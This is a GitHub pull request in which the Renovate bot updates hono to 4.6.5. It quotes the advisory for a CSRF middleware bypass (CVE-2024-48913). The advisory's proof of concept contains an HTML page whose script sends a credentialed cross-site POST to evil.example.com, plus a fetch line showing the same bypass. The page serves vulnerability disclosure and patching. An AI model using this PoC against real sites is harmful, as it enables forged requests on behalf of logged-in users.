search

beeequeue / arm-server

📃 A service for mapping Anime IDs between Database Websites
https://arm.haglund.dev/docs
GNU Affero General Public License v3.0
97 stars 11 forks source link

Update dependency hono to v4.6.5 [SECURITY] #822

Closed renovate[bot] closed 1 month ago

renovate[bot] commented 1 month ago

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
hono (source) 4.6.4 -> 4.6.5 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)
<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

Release Notes

honojs/hono (hono) ### [`v4.6.5`](https://redirect.github.com/honojs/hono/releases/tag/v4.6.5) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.6.4...v4.6.5) #### Security fix for CSRF Protection Middleware This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this `hono` package immediately. Before this release, a request without a `Content-Type` header can bypass the protection. This fix does not allow it. See: https://github.com/honojs/hono/security/advisories/GHSA-2234-fmw7-43wr #### What's Changed - perf(types): replace intersection with union to get better perf by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3443](https://redirect.github.com/honojs/hono/pull/3443) - ci: use Deno `v2` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3506](https://redirect.github.com/honojs/hono/pull/3506) - ci: use Deno v2 for a test running for deno by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3509](https://redirect.github.com/honojs/hono/pull/3509) - fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3507](https://redirect.github.com/honojs/hono/pull/3507) - fix(cors): avoid setting `Access-Control-Allow-Origin` if there is no matching origin by [@​uki00a](https://redirect.github.com/uki00a) in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510) - feat(powered-by): optional server name by [@​PatrickJS](https://redirect.github.com/PatrickJS) in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492) - fix(factory): revert PR [#​3498](https://redirect.github.com/honojs/hono/issues/3498) by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3515](https://redirect.github.com/honojs/hono/pull/3515) - fix(build): remove private fields by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3514](https://redirect.github.com/honojs/hono/pull/3514) #### New Contributors - [@​uki00a](https://redirect.github.com/uki00a) made their first contribution in [https://github.com/honojs/hono/pull/3510](https://redirect.github.com/honojs/hono/pull/3510) - [@​PatrickJS](https://redirect.github.com/PatrickJS) made their first contribution in [https://github.com/honojs/hono/pull/3492](https://redirect.github.com/honojs/hono/pull/3492) **Full Changelog**: https://github.com/honojs/hono/compare/v4.6.4...v4.6.5

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR was generated by Mend Renovate. View the repository job log.